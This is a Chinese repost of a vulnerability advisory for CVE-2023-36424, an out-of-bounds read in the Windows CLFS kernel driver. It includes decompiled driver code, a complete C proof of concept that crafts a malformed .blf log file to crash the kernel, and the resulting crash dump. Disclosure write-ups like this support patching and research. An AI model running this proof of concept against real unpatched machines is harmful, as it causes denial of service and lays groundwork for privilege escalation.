Windows 内核池 (CLFS.SYS) 损坏权限升级

Windows 内核池 (CLFS.SYS) 损坏权限升级
2023-12-21 17:27:20 Author: Ots安全(查看原文) 阅读量:7 收藏

yyayauw

概括

针对跟踪为 CVE-2023-36424 的 Windows 漏洞的概念验证 ( PoC ) 漏洞利用代码已发布。此高严重性 Windows 漏洞，评分 7.8，为攻击者打开了将权限从中完整性级别提升到高完整性级别的网关。此安全漏洞的关键在于通用日志文件系统驱动程序组件，该组件中的一个漏洞允许本地经过身份验证的攻击者通过执行特制程序来提升权限阶梯。

该漏洞存在于驱动clfs.sys中IRP_MJ_CREATE请求的处理中，主要涉及内核中blf文件的解析。仔细检查发现 CClfsLogFcbPhysical::RecoverTruncateLog 中截断元数据块处理过程中存在缺陷。驱动程序的检查不充分，导致越界 (OOB) 读取，这是此漏洞利用的基础。

信用

一位从事 SSD Secure Disclosure 工作的独立安全研究员。

受影响的版本

运行版本 10.0.22621.1555 的 64 位 clfs.sys 的 Windows 系统

供应商回应

供应商已发布针对此漏洞的补丁，可从以下位置获取：https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36424

技术分析

在处理 CClfsLogFcbPhysical::RecoverTruncateLog 驱动程序中的截断元数据块期间，执行检查，确保所有子结构都适合元数据块：

  dTruncateMetadataBlockPayloadSize = 1;  pTruncateMetadataBlock = 0i64;  dStatus = CClfsBaseFilePersisted::AcquireTruncateContext(              this->pBaseFilePersisted,              &dTruncateMetadataBlockPayloadSize,              &pTruncateContext,              &pTruncate,              &dTruncatePayloadSize);

NTSTATUS __fastcall CClfsBaseFilePersisted::AcquireTruncateContext(        CClfsBaseFilePersisted *this,        unsigned int *i_pdMinimumTruncateMetadataBlockPayloadSize,        CLFS_TRUNCATE_CONTEXT **o_pTruncateContext,        CLFS_TRUNCATE_RECORD **o_pTruncatePayload,        unsigned int *o_dTruncatePayloadSize){  char flAcquiredTruncateMetadataBlock; // si  BOOLEAN v10; // r13  NTSTATUS dStatus; // ebx  CLFS_LOG_BLOCK_HEADER *pData; // r10  CLFS_CONTROL_RECORD *pRecord; // rcx  NTSTATUS dStatus_1; // [rsp+24h] [rbp-34h]  CLFS_CONTROL_RECORD *pControlRecord; // [rsp+28h] [rbp-30h] BYREF
  pControlRecord = 0i64;  flAcquiredTruncateMetadataBlock = 0;  *o_pTruncateContext = 0i64;  v10 = ExAcquireResourceExclusiveLite(this->sBase.pImageResource, 1u);  dStatus = CClfsBaseFile::GetControlRecord(&this->sBase, &pControlRecord);  dStatus_1 = dStatus;  if ( dStatus >= 0 )  {    dStatus = CClfsBaseFile::AcquireMetadataBlock(this, TRUNCATE);    dStatus_1 = dStatus;    if ( dStatus >= 0 )    {      flAcquiredTruncateMetadataBlock = 1;      pData = this->sBase.pMetaBlockArray[TRUNCATE].pData;      if ( pData )      {        dStatus = RtlULongSub(pData->dBackupOffset, pData->dPayloadOffset, o_dTruncatePayloadSize);        dStatus_1 = dStatus;        if ( dStatus < 0 )          goto LABEL_10;        if ( *o_dTruncatePayloadSize >= *i_pdMinimumTruncateMetadataBlockPayloadSize )...

要求是 truncate 的有效负载大小应大于或等于 i_pdMinimumTruncateMetadataBlockPayloadSize，在调用过程中定义为 1。

但在截断内偏移量 0x8 和 0xc 处进一步驱动程序取消引用字段：

bool __fastcall CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid(        __int64 a1,        CLFS_TRUNCATE_RECORD *i_pTruncate,        unsigned int i_dTruncatePayloadSize){  unsigned int dOffsetToOwnerPage; // ecx  unsigned int dOffsetToClientChange; // edx  bool v5; // cc
  dOffsetToOwnerPage = i_pTruncate->dOffsetToOwnerPage;  if ( dOffsetToOwnerPage < 0x10 )    return 0;  dOffsetToClientChange = i_pTruncate->dOffsetToClientChange;  if ( dOffsetToClientChange < 0x10...

00000000 CLFS_TRUNCATE struc00000000 field_0         dq ?00000008 dOffsetToClientChange dd ?0000000C dOffsetToOwnerPage dd ?00000010 field_10        dq ?00000018 field_18        dq ?00000020 field_20        dd ?00000024 field_24        dd ?00000028 CLFS_TRUNCATE_RECORD ends

结果发生 OOB 读取。

要重现崩溃，可以使用以下命令（为驱动程序启用特殊池）：

verifier /flags 0x1 /driver clfs.sys

概念验证

#include <Windows.h>#include <winternl.h>#include <stdio.h>
UINT32 CRC32Reflect(UINT32 a, UINT8 b) {    UINT32 result = 0;    UINT8 j = 1;    for (UINT32 i = a; j <= b; ++j) {        if (i & 1)            result |= 1 << (b - j);        i >>= 1;    }    return result;}
UINT32 CRC32Compute(UINT8* buffer, size_t buflen) {    UINT32 polynomial = 0x4C11DB7;    UINT32 crcTable[0x100] = { 0 };    for (int i = 0; i < 0x100; ++i) {        UINT32 tmp1 = CRC32Reflect(i, 8);        INT32 tmp2 = tmp1 << 24;        for (int j = 8; j > 0; --j) {            tmp2 = 2 * tmp2 ^ ((tmp2 >> 31) & 0x4C11DB7);        }        crcTable[i] = CRC32Reflect(tmp2, 0x20);    }    UINT32 result = 0xffffffff;    for (size_t i = 0; i < buflen; ++i) {        result = (result >> 8) ^ crcTable[(UINT8)result ^ buffer[i]];    }    return ~result;}
UINT32 ClfsEncodeBlockPrivate(UINT8* block, UINT32 sectorSize, UINT32 a3, UINT32 a4) {    if (!*(UINT16*)(block + 4) || *(UINT16*)(block + 6) < *(UINT16*)(block + 4) || *(UINT16*)(block + 4) << 9 > sectorSize)        return 0xC01A000A;    if (a4 > 0x10)        return 0xC000000D;    if (!(a3 & 0x10111))        return 0xC000000D;    if ((*(UINT32*)(block + 0x10) & 1))        return 0xC01A000A;    UINT32 backupOffset = *(UINT32*)(block + 0x68);    UINT16* backup = (UINT16*)(block + backupOffset);    UINT32 sectorCount = sectorSize >> 9;    if ((backupOffset & 7) || ((backupOffset + 2 * sectorCount) > sectorSize))        return 0xC01A000A;    for (UINT32 i = 0; i < sectorCount; ++i) {        UINT8 flag = a4 | ((i) ? 0x0 : 0x40) | ((sectorCount - 1 != i) ? 0x0 : 0x20);        UINT16 checksum = ((a3 << 8) & 0xff00) | (flag & 0xff);        backup[i] = *(UINT16*)(block + 0x1fe + (i << 9));        *(UINT16*)(block + 0x1fe + (i << 9)) = checksum;    }    *(UINT32*)(block + 0x10) = (*(UINT32*)(block + 0x10) & 0xFFFFFFFD) | 1;    return 0;}
void ClfsEncodeBlock(UINT8* block) {    ClfsEncodeBlockPrivate(block, *(UINT16*)(block + 4) << 9, *(UINT8*)(block + 2), 0x10);    *(UINT32*)(block + 0xc) = CRC32Compute(block, *(UINT16*)(block + 4) << 9);}
char* generateBLF() {    char curPathA[MAX_PATH] = { 0 };    GetCurrentDirectoryA(MAX_PATH, curPathA);    wchar_t curPathW[MAX_PATH] = { 0 };    GetCurrentDirectoryW(MAX_PATH, curPathW);    char* CLFSPath = new char[MAX_PATH];    memset(CLFSPath, 0, MAX_PATH * sizeof(char));    strcat_s(CLFSPath, MAX_PATH, curPathA);    strcat_s(CLFSPath, MAX_PATH, "\\ssd_01");    char* BLFPath = new char[MAX_PATH];    memset(BLFPath, 0, MAX_PATH * sizeof(char));    strcat_s(BLFPath, MAX_PATH, CLFSPath);    strcat_s(BLFPath, MAX_PATH, ".blf");    wchar_t* containerPath = new wchar_t[MAX_PATH];    memset(containerPath, 0, MAX_PATH * sizeof(wchar_t));    wchar_t* containerPathTmp = new wchar_t[MAX_PATH];    memset(containerPathTmp, 0, MAX_PATH * sizeof(wchar_t));    wcscat_s(containerPath, MAX_PATH, L"\\??\\");    wcscat_s(containerPath, MAX_PATH, curPathW);    wcscat_s(containerPath, MAX_PATH, L"\\ssd_01");    wcscat_s(containerPathTmp, MAX_PATH, curPathW);    wcscat_s(containerPathTmp, MAX_PATH, L"\\ssd_01");
    size_t filesize = 0x400 + 0x400 + 0x2000 + 0x2000 + 0x2000 + 0x2000;    UINT8* filebuf = new UINT8[filesize];    memset(filebuf, 0, filesize);    *(UINT16*)(filebuf + 0x0 + 0x0) = 0x15;    *(UINT16*)(filebuf + 0x0 + 0x2) = 0x1;    *(UINT16*)(filebuf + 0x0 + 0x4) = 0x400 >> 9;    *(UINT16*)(filebuf + 0x0 + 0x6) = 0x400 >> 9;    *(UINT16*)(filebuf + 0x0 + 0x28) = 0x70;    *(UINT16*)(filebuf + 0x0 + 0x68) = (0x400 - 2 * (0x400 >> 9)) & (~7);    *(UINT64*)(filebuf + 0x0 + 0x70 + 8) = 0xC1F5C1F500005F1C;
    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x28 + 0x0) = 0x3;    *(UINT64*)(filebuf + 0x0 + 0x70 + 0x28 + 0x8) = 0x0;    *(UINT64*)(filebuf + 0x0 + 0x70 + 0x28 + 0x10) = 0x10000;    *(UINT64*)(filebuf + 0x0 + 0x70 + 0x48) = 0x6;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 8) = 0x400;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x20) = 0x400;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x24) = 0x400;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x28) = 0x1;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x38) = 0x2000;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x3c) = 0x800;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x40) = 0x2;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x50) = 0x2000;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x54) = 0x2800;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x58) = 0x3;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x68) = 0x200;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x6c) = 0x4800;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x70) = 0x4;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x80) = 0x200;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x84) = 0x4a00;    *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x88) = 0x5;
    // BASELOG record    *(UINT16*)(filebuf + 0x800 + 0x0) = 0x15;    *(UINT16*)(filebuf + 0x800 + 0x2) = 0x1;    *(UINT16*)(filebuf + 0x800 + 0x4) = 0x2000 >> 9;    *(UINT16*)(filebuf + 0x800 + 0x6) = 0x2000 >> 9;    *(UINT16*)(filebuf + 0x800 + 0x28) = 0x70;    *(UINT16*)(filebuf + 0x800 + 0x68) = (0x2000 - 2 * (0x2000 >> 9)) & (~7);    // sHashTable1Entries    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x18) = 0x1338;    // sHashTable2Entries    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x70) = 0x14f0;    // dContainersCount    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x12c) = 0x1;    // sClientSymbolOffsetsArray    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x138) = 0x1368;    // sContainerSymbolOffsetsArray    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x32c) = 0x1520;    // dLastAvailableSymOffset    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1328) = 0x800;    // dContainerCount    *(UINT8*)(filebuf + 0x800 + 0x70 + 0x1334) = 0x1;    // CLFS_CLIENT_CONTEXT      *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x0) = 0xC1FDF006;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x4) = 0x30;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x8) = 0x0;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0xc) = 0xb8;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x20) = 0x13f0;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x24) = 0x1368;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x0) = 0xC1FDF007;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x4) = 0x88;    *(UINT64*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x8) = 0x100000000;    *(UINT8*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x10) = 0x1;    *(UINT8*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x11) = 0x0;    *(UINT16*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x12) = 0x0;    *(UINT16*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x24) = 0x1;    *(UINT16*)(filebuf + 0x800 + 0x70 + 0x13f0) = 0x0;    // CLFS_CONTAINER_CONTEXT    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x0) = 0xC1FDF006;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x4) = 0x30;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x8) = 0x0;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0xc) = 0xb8;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x20) = 0x1550;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x24) = 0x1520;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x0) = 0xC1FDF008;    *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x4) = 0x30;    *(UINT64*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x8) = 0x80000;    *(UINT8*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x10) = 0x1;    *(UINT8*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x11) = 0x0;    *(UINT16*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x12) = 0x0;    *(UINT16*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x24) = 0x1;    wcscpy_s((wchar_t*)(filebuf + 0x800 + 0x70 + 0x1550), MAX_PATH, containerPath);

    *(UINT16*)(filebuf + 0x4800 + 0x0) = 0x15;    *(UINT16*)(filebuf + 0x4800 + 0x2) = 0x1;    *(UINT16*)(filebuf + 0x4800 + 0x4) = 0x200 >> 9;    *(UINT16*)(filebuf + 0x4800 + 0x6) = 0x200 >> 9;    *(UINT16*)(filebuf + 0x4800 + 0x28) = 0x1f7;    *(UINT32*)(filebuf + 0x4800 + 0x68) = (0x200 - 2 * (0x200 >> 9)) & (~7);

    ClfsEncodeBlock(filebuf + 0x0);    ClfsEncodeBlock(filebuf + 0x800);    ClfsEncodeBlock(filebuf + 0x4800);
    DeleteFileA(BLFPath);    DeleteFileW(containerPathTmp);
    HANDLE hBLFFile = CreateFileA(BLFPath, GENERIC_ALL, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0);    if (hBLFFile == INVALID_HANDLE_VALUE) {        printf("CreateFileW failed: %x\n", GetLastError());        return NULL;    }    DWORD written = 0;    if (!WriteFile(hBLFFile, filebuf, filesize, &written, NULL)) {        printf("WriteFile failed: %x\n", GetLastError());        return NULL;    }    CloseHandle(hBLFFile);    return CLFSPath;}
bool triggerCLFS() {    char* newfilepath = generateBLF();    if (!newfilepath) {        printf("failed generateBLF");        return -1;    }    char fullfilepath[MAX_PATH] = { 0 };    strcat_s(fullfilepath, "\\\\.\\LOG:\\??\\");    strcat_s(fullfilepath, newfilepath);    HANDLE hFile = CreateFileA(fullfilepath, GENERIC_READ, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);    CloseHandle(hFile);    return true;}
int main(int argc, char* argv[]) {    if (!triggerCLFS()) {        printf("failed triggerCLFS");        return -1;    }    return 0;}

崩溃转储

********************************************************************************                                                                             **                        Bugcheck Analysis                                    **                                                                             ********************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)Invalid system memory was referenced.  This cannot be protected by try-except.Typically the address is just plain bad or it is pointing at freed memory.Arguments:Arg1: ffffc8050a59b003, memory referenced.Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.Arg3: fffff8072f73111c, If non-zero, the instruction address which referenced the bad memory    address.Arg4: 0000000000000000, (reserved)
Debugging Details:------------------
KEY_VALUES_STRING: 1
    Key  : AV.Type    Value: Read
    Key  : Analysis.CPU.mSec    Value: 2311
    Key  : Analysis.DebugAnalysisManager    Value: Create
    Key  : Analysis.Elapsed.mSec    Value: 28648
    Key  : Analysis.Init.CPU.mSec    Value: 5936
    Key  : Analysis.Init.Elapsed.mSec    Value: 2337520
    Key  : Analysis.Memory.CommitPeak.Mb    Value: 112
    Key  : WER.OS.Branch    Value: ni_release
    Key  : WER.OS.Timestamp    Value: 2022-05-06T12:50:00Z
    Key  : WER.OS.Version    Value: 10.0.22621.1

BUGCHECK_CODE:  50
BUGCHECK_P1: ffffc8050a59b003
BUGCHECK_P2: 0
BUGCHECK_P3: fffff8072f73111c
BUGCHECK_P4: 0
READ_ADDRESS:  ffffc8050a59b003 Special pool
MM_INTERNAL_CODE:  0
IMAGE_NAME:  CLFS.SYS
MODULE_NAME: CLFS
FAULTING_MODULE: fffff8072f720000 CLFS
PROCESS_NAME:  ssd_01.exe
TRAP_FRAME:  ffffb08615db7f00 -- (.trap 0xffffb08615db7f00)NOTE: The trap frame does not contain all registers.Some register values may be zeroed or incorrect.rax=00000000000001ff rbx=0000000000000000 rcx=0000000000000200rdx=ffffc8050a59aff7 rsi=0000000000000000 rdi=0000000000000000rip=fffff8072f73111c rsp=ffffb08615db8098 rbp=ffffb08615db8750 r8=0000000000000001  r9=0000000000000001 r10=ffffc8050a59ae00r11=ffffb30440fea000 r12=0000000000000000 r13=0000000000000000r14=0000000000000000 r15=0000000000000000iopl=0         nv up ei pl zr na po ncCLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid:fffff807`2f73111c 8b4a0c          mov     ecx,dword ptr [rdx+0Ch] ds:ffffc805`0a59b003=????????Resetting default scope
STACK_TEXT:  ffffb086`15db74c8 fffff807`2e972062     : ffffb086`15db7630 fffff807`2e73a510 ffffdd00`55de0180 ffffc805`0a59b001 : nt!DbgBreakPointWithStatusffffb086`15db74d0 fffff807`2e971753     : ffffdd00`00000003 ffffb086`15db7630 fffff807`2e85c680 ffffb086`15db7be0 : nt!KiBugCheckDebugBreak+0x12ffffb086`15db7530 fffff807`2e8434a7     : 00000000`00000000 00000000`00000000 00000000`00000000 ffffc805`0a59b003 : nt!KeBugCheck2+0xba3ffffb086`15db7ca0 fffff807`2e8befe9     : 00000000`00000050 ffffc805`0a59b003 00000000`00000000 ffffb086`15db7f00 : nt!KeBugCheckEx+0x107ffffb086`15db7ce0 fffff807`2e7054dc     : ffffb304`3c061150 00000000`00000000 ffffb086`15db7e99 00000000`00000000 : nt!MiSystemFault+0x1bca29ffffb086`15db7de0 fffff807`2e853f29     : 00000000`00004a00 ffffc805`0a59ce00 ffffb304`40fe8164 00000000`00000000 : nt!MmAccessFault+0x29cffffb086`15db7f00 fffff807`2f73111c     : fffff807`2f7495e8 ffffb304`40fea000 00000000`00000000 ffffb304`40f8bee0 : nt!KiPageFault+0x369ffffb086`15db8098 fffff807`2f7495e8     : ffffb304`40fea000 00000000`00000000 ffffb304`40f8bee0 ffffb304`40fe8480 : CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValidffffb086`15db80a0 fffff807`2f722d16     : ffffb304`40fe8000 ffffb304`40f8bee0 00000000`00000001 ffffc805`0a596c98 : CLFS!CClfsLogFcbPhysical::RecoverTruncateLog+0x9cffffb086`15db8100 fffff807`2f755ade     : ffffb304`40fe8000 00000000`00000001 ffffb304`3f704ac0 ffffb304`00120089 : CLFS!CClfsLogFcbPhysical::Initialize+0x94affffb086`15db8220 fffff807`2f754bdb     : ffffb304`3f0fe1a0 ffffccf8`51200001 00000000`00000000 fffff807`2f750000 : CLFS!CClfsRequest::Create+0x67affffb086`15db8370 fffff807`2f75416e     : ffffb304`3f0fe1a0 ffffb304`3c211d50 ffffb304`3c5fd640 00000000`00000001 : CLFS!CClfsRequest::Dispatch+0x7fffffb086`15db83c0 fffff807`2f7540b7     : ffffb304`3c5fd640 ffffb304`3c5fd640 ffffb304`3c5fd640 00000000`00000040 : CLFS!ClfsDispatchIoRequest+0x8effffb086`15db8410 fffff807`2e656275     : 00000000`00000000 fffff807`2e65e303 00000000`00000000 ffffb304`3c211d50 : CLFS!CClfsDriver::LogIoDispatch+0x27ffffb086`15db8440 fffff807`2eac1ae9     : 00000000`00000000 ffffb086`15db8750 ffffb304`3c5fd640 ffffb304`40f8b580 : nt!IofCallDriver+0x55ffffb086`15db8480 fffff807`2eabd217     : fffff807`2eac1220 fffff807`2eac1220 00000000`00000001 ffffb304`3c0f6900 : nt!IopParseDevice+0x8c9ffffb086`15db8650 fffff807`2eabc642     : ffffc805`09c1adf0 ffffb086`15db8880 00000000`00000040 ffffb304`3c0f6e80 : nt!ObpLookupObjectName+0x697ffffb086`15db87f0 fffff807`2ead1e29     : 00000000`00000000 ffffb304`3f2ebaa0 00000048`03bdf420 00000000`00000001 : nt!ObOpenObjectByNameEx+0x1f2ffffb086`15db8920 fffff807`2ead19d9     : 00000048`03bdf3c0 00000000`00000000 00000048`03bdf420 00000048`03bdf3c8 : nt!IopCreateFile+0x439ffffb086`15db89e0 fffff807`2e8580e8     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateFile+0x79ffffb086`15db8a70 00007ff9`924ef6f4     : 00007ff9`8fcdaa60 00000000`00000080 00000000`00000000 00000000`642f0000 : nt!KiSystemServiceCopyEnd+0x2800000048`03bdf338 00007ff9`8fcdaa60     : 00000000`00000080 00000000`00000000 00000000`642f0000 00000000`00000000 : ntdll!NtCreateFile+0x1400000048`03bdf340 00007ff9`8fcda2d8     : 00000048`03bdf500 00007ff9`0000003e 00000177`d5370001 00000000`00000000 : KERNELBASE!CreateFileInternal+0x59000000048`03bdf4b0 00007ff6`662e2bc8     : 00000000`00000000 00000048`03bdf6b4 00000000`00000000 00000048`03bdf580 : KERNELBASE!CreateFileA+0xe800000048`03bdf540 00007ff6`662e2d48     : 00007ff6`662f50a3 00000000`00000016 00000177`00000000 00007ff9`4d2203c8 : ssd_01!triggerCLFS+0xb800000048`03bdf7d0 00007ff6`662e37a9     : 0000ea95`00000001 00000177`d5379950 00000000`00000000 00007ff6`662e4eed : ssd_01!main+0x2800000048`03bdf8d0 00007ff6`662e364e     : 00007ff6`662eb000 00007ff6`662eb220 00000000`00000000 00000000`00000000 : ssd_01!invoke_main+0x3900000048`03bdf920 00007ff6`662e350e     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ssd_01!__scrt_common_main_seh+0x12e00000048`03bdf990 00007ff6`662e383e     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ssd_01!__scrt_common_main+0xe00000048`03bdf9c0 00007ff9`91b2269d     : 00000048`03cbd000 00000000`00000000 00000000`00000000 00000000`00000000 : ssd_01!mainCRTStartup+0xe00000048`03bdf9f0 00007ff9`924aa9f8     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x1d00000048`03bdfa20 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x28

SYMBOL_NAME:  CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid+0
STACK_COMMAND:  .cxr; .ecxr ; kb
BUCKET_ID_FUNC_OFFSET:  0
FAILURE_BUCKET_ID:  AV_VRF_R_(null)_CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid
OS_VERSION:  10.0.22621.1
BUILDLAB_STR:  ni_release
OSPLATFORM_TYPE:  x64
OSNAME:  Windows 10
FAILURE_ID_HASH:  {be87c7fe-0f3f-c3b0-3400-56d9576bc7ff}
Followup:     MachineOwner---------

原文地址：

https://ssd-disclosure.com/ssd-advisory-windows-kernel-pool-clfs-sys-corruption-privilege-escalation/

感谢您抽出

来阅读本文

点它，分享点赞在看都在这里

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247503385&idx=1&sn=5b338b55f8c67220313e8c196e95cf7e&chksm=9a172732436e5cd0a5e8227f0b255cdeb21c817b6fec9fcd1557b607094181ef6b7f360dd8b9&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh